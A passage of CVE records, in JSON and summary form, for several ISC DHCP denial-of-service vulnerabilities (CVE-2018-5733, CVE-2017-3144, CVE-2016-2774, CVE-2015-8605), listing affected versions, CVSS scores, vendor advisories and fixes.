                            "version_value": "4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "ISC"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Successful exploitation of this vulnerability may exhaust the memory available to dhcpd and/or cause it to crash, resulting in a denial of service to clients."
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://kb.isc.org/docs/aa-01567",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/docs/aa-01567"
            },
            {
              "name": "RHSA-2018:0469",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:0469"
            },
            {
              "name": "DSA-4133",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2018/dsa-4133"
            },
            {
              "name": "USN-3586-2",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3586-2/"
            },
            {
              "name": "RHSA-2018:0483",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:0483"
            },
            {
              "name": "USN-3586-1",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3586-1/"
            },
            {
              "name": "103188",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/103188"
            },
            {
              "name": "1040437",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1040437"
            },
            {
              "name": "[debian-lts-announce] 20180322 [SECURITY] [DLA 1313-1] isc-dhcp security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Upgrade to the patched release most closely related to your current version of DHCP.\n\n    DHCP 4.1-ESV-R15-P1\n    DHCP 4.3.6-P1\n    DHCP 4.4.1"
          }
        ],
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
    "assignerShortName": "isc",
    "cveId": "CVE-2018-5733",
    "datePublished": "2019-01-16T20:00:00.000Z",
    "dateReserved": "2018-01-17T00:00:00.000Z",
    "dateUpdated": "2025-04-25T23:02:52.084Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2017-3144 (GCVE-0-2017-3144)

Vulnerability from cvelistv5 – Published: 2019-01-16 20:00 – Updated: 2024-09-16 22:46
Title
Failure to properly clean up closed OMAPI connections can exhaust available sockets
Summary
A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. Affects ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested.
CWE
  • By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server. Once exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator. While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc.
Assigner
isc
References
https://access.redhat.com/errata/RHSA-2018:0158 (vendor-advisory, x_refsource_REDHAT)
https://www.debian.org/security/2018/dsa-4133 (vendor-advisory, x_refsource_DEBIAN)
http://www.securityfocus.com/bid/102726 (vdb-entry, x_refsource_BID)
http://www.securitytracker.com/id/1040194 (vdb-entry, x_refsource_SECTRACK)
https://usn.ubuntu.com/3586-1/ (vendor-advisory, x_refsource_UBUNTU)
https://kb.isc.org/docs/aa-01541 (x_refsource_CONFIRM)
Impacted products
Vendor: ISC
Product: ISC DHCP
Version: Affected: ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested.
Date Public
2018-01-16 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T14:16:28.230Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "RHSA-2018:0158",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:0158"
          },
          {
            "name": "DSA-4133",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2018/dsa-4133"
          },
          {
            "name": "102726",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/102726"
          },
          {
            "name": "1040194",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1040194"
          },
          {
            "name": "USN-3586-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3586-1/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/docs/aa-01541"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ISC DHCP",
          "vendor": "ISC",
          "versions": [
            {
              "status": "affected",
              "version": "ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6.  Older versions may also be affected but are well beyond their end-of-life (EOL).  Releases prior to 4.1.0 have not been tested."
            }
          ]
        }
      ],
      "datePublic": "2018-01-16T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. Affects ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server.\n\nOnce exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator.  While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc.",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-01-17T10:57:01.000Z",
        "orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
        "shortName": "isc"
      },
      "references": [
        {
          "name": "RHSA-2018:0158",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:0158"
        },
        {
          "name": "DSA-4133",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2018/dsa-4133"
        },
        {
          "name": "102726",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/102726"
        },
        {
          "name": "1040194",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1040194"
        },
        {
          "name": "USN-3586-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3586-1/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/docs/aa-01541"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Failure to properly clean up closed OMAPI connections can exhaust available sockets",
      "workarounds": [
        {
          "lang": "en",
          "value": "The recommended remedy is to disallow access to the OMAPI control port from unauthorized clients (in accordance with best practices for server operation)."
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-officer@isc.org",
          "DATE_PUBLIC": "2018-01-16T00:00:00.000Z",
          "ID": "CVE-2017-3144",
          "STATE": "PUBLIC",
          "TITLE": "Failure to properly clean up closed OMAPI connections can exhaust available sockets"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "ISC DHCP",
                      "version": {
                        "version_data": [
                          {
                            "version_name": "ISC DHCP",
                            "version_value": "4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6.  Older versions may also be affected but are well beyond their end-of-life (EOL).  Releases prior to 4.1.0 have not been tested."
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "ISC"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. Affects ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server.\n\nOnce exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator.  While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc."
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "RHSA-2018:0158",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:0158"
            },
            {
              "name": "DSA-4133",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2018/dsa-4133"
            },
            {
              "name": "102726",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/102726"
            },
            {
              "name": "1040194",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1040194"
            },
            {
              "name": "USN-3586-1",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3586-1/"
            },
            {
              "name": "https://kb.isc.org/docs/aa-01541",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/docs/aa-01541"
            }
          ]
        },
        "source": {
          "discovery": "UNKNOWN"
        },
        "work_around": [
          {
            "lang": "en",
            "value": "The recommended remedy is to disallow access to the OMAPI control port from unauthorized clients (in accordance with best practices for server operation)."
          }
        ]
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
    "assignerShortName": "isc",
    "cveId": "CVE-2017-3144",
    "datePublished": "2019-01-16T20:00:00.000Z",
    "dateReserved": "2016-12-02T00:00:00.000Z",
    "dateUpdated": "2024-09-16T22:46:13.879Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2016-2774 (GCVE-0-2016-2774)

Vulnerability from cvelistv5 – Published: 2016-03-09 15:26 – Updated: 2024-08-05 23:32
Summary
ISC DHCP 4.1.x before 4.1-ESV-R13 and 4.2.x and 4.3.x before 4.3.4 does not restrict the number of concurrent TCP sessions, which allows remote attackers to cause a denial of service (INSIST assertion failure or request-processing outage) by establishing many sessions.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
http://rhn.redhat.com/errata/RHSA-2016-2590.html (vendor-advisory, x_refsource_REDHAT)
http://www.securitytracker.com/id/1035196 (vdb-entry, x_refsource_SECTRACK)
https://kb.isc.org/article/AA-01354 (x_refsource_CONFIRM)
http://www.oracle.com/technetwork/topics/security… (x_refsource_CONFIRM)
http://lists.fedoraproject.org/pipermail/package-… (vendor-advisory, x_refsource_FEDORA)
https://usn.ubuntu.com/3586-1/ (vendor-advisory, x_refsource_UBUNTU)
http://lists.opensuse.org/opensuse-updates/2016-0… (vendor-advisory, x_refsource_SUSE)
http://lists.fedoraproject.org/pipermail/package-… (vendor-advisory, x_refsource_FEDORA)
http://www.securityfocus.com/bid/84208 (vdb-entry, x_refsource_BID)
https://lists.debian.org/debian-lts-announce/2019… (mailing-list, x_refsource_MLIST)
Date Public
2016-03-07 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T23:32:20.980Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "RHSA-2016:2590",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2016-2590.html"
          },
          {
            "name": "1035196",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1035196"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-01354"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
          },
          {
            "name": "FEDORA-2016-821f013cb1",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183640.html"
          },
          {
            "name": "USN-3586-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3586-1/"
          },
          {
            "name": "openSUSE-SU-2016:1843",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2016-07/msg00066.html"
          },
          {
            "name": "FEDORA-2016-c93d49faf3",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183458.html"
          },
          {
            "name": "84208",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/84208"
          },
          {
            "name": "[debian-lts-announce] 20191124 [SECURITY] [DLA 2003-1] isc-dhcp security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00023.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-03-07T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "ISC DHCP 4.1.x before 4.1-ESV-R13 and 4.2.x and 4.3.x before 4.3.4 does not restrict the number of concurrent TCP sessions, which allows remote attackers to cause a denial of service (INSIST assertion failure or request-processing outage) by establishing many sessions."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-11-24T19:07:04.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "RHSA-2016:2590",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2016-2590.html"
        },
        {
          "name": "1035196",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1035196"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-01354"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
        },
        {
          "name": "FEDORA-2016-821f013cb1",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183640.html"
        },
        {
          "name": "USN-3586-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3586-1/"
        },
        {
          "name": "openSUSE-SU-2016:1843",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2016-07/msg00066.html"
        },
        {
          "name": "FEDORA-2016-c93d49faf3",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183458.html"
        },
        {
          "name": "84208",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/84208"
        },
        {
          "name": "[debian-lts-announce] 20191124 [SECURITY] [DLA 2003-1] isc-dhcp security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00023.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2016-2774",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "ISC DHCP 4.1.x before 4.1-ESV-R13 and 4.2.x and 4.3.x before 4.3.4 does not restrict the number of concurrent TCP sessions, which allows remote attackers to cause a denial of service (INSIST assertion failure or request-processing outage) by establishing many sessions."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "RHSA-2016:2590",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2016-2590.html"
            },
            {
              "name": "1035196",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1035196"
            },
            {
              "name": "https://kb.isc.org/article/AA-01354",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-01354"
            },
            {
              "name": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html",
              "refsource": "CONFIRM",
              "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
            },
            {
              "name": "FEDORA-2016-821f013cb1",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183640.html"
            },
            {
              "name": "USN-3586-1",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3586-1/"
            },
            {
              "name": "openSUSE-SU-2016:1843",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2016-07/msg00066.html"
            },
            {
              "name": "FEDORA-2016-c93d49faf3",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183458.html"
            },
            {
              "name": "84208",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/84208"
            },
            {
              "name": "[debian-lts-announce] 20191124 [SECURITY] [DLA 2003-1] isc-dhcp security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00023.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2016-2774",
    "datePublished": "2016-03-09T15:26:00.000Z",
    "dateReserved": "2016-02-26T00:00:00.000Z",
    "dateUpdated": "2024-08-05T23:32:20.980Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2015-8605 (GCVE-0-2015-8605)

Vulnerability from cvelistv5 – Published: 2016-01-14 22:00 – Updated: 2024-08-06 08:20
Summary
ISC DHCP 4.x before 4.1-ESV-R12-P1, 4.2.x, and 4.3.x before 4.3.3-P1 allows remote attackers to cause a denial of service (application crash) via an invalid length field in a UDP IPv4 packet.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
Date Public
2016-01-12 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T08:20:43.591Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1034657",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1034657"
          },
          {
            "name": "openSUSE-SU-2016:0610",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00168.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-01334"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
          },
          {
            "name": "FEDORA-2016-0c5bb21bf1",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/175594.html"
          },
          {
            "name": "DSA-3442",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2016/dsa-3442"
          },
          {
            "name": "USN-2868-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/USN-2868-1"
          },
          {
            "name": "FEDORA-2016-adb533a418",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176031.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
          },
          {
            "name": "80703",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/80703"
          },
          {
            "name": "openSUSE-SU-2016:0601",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00162.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-01-12T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "ISC DHCP 4.x before 4.1-ESV-R12-P1, 4.2.x, and 4.3.x before 4.3.3-P1 allows remote attackers to cause a denial of service (application crash) via an invalid length field in a UDP IPv4 packet."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-12-05T14:57:01.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1034657",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1034657"
        },
        {
          "name": "openSUSE-SU-2016:0610",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00168.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-01334"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
        },
        {
          "name": "FEDORA-2016-0c5bb21bf1",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/175594.html"
        },
        {
          "name": "DSA-3442",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2016/dsa-3442"
        },
        {
          "name": "USN-2868-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/USN-2868-1"
        },
        {
          "name": "FEDORA-2016-adb533a418",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176031.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
        },
        {
          "name": "80703",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/80703"
        },
        {
          "name": "openSUSE-SU-2016:0601",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00162.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-8605",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "ISC DHCP 4.x before 4.1-ESV-R12-P1, 4.2.x, and 4.3.x before 4.3.3-P1 allows remote attackers to cause a denial of service (application crash) via an invalid length field in a UDP IPv4 packet."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1034657",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1034657"
            },
            {
              "name": "openSUSE-SU-2016:0610",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00168.html"
            },
            {
              "name": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/",
              "refsource": "CONFIRM",
              "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
            },
            {
              "name": "https://kb.isc.org/article/AA-01334",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-01334"
            },
            {
              "name": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/",
              "refsource": "CONFIRM",
              "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
            },
            {
              "name": "FEDORA-2016-0c5bb21bf1",
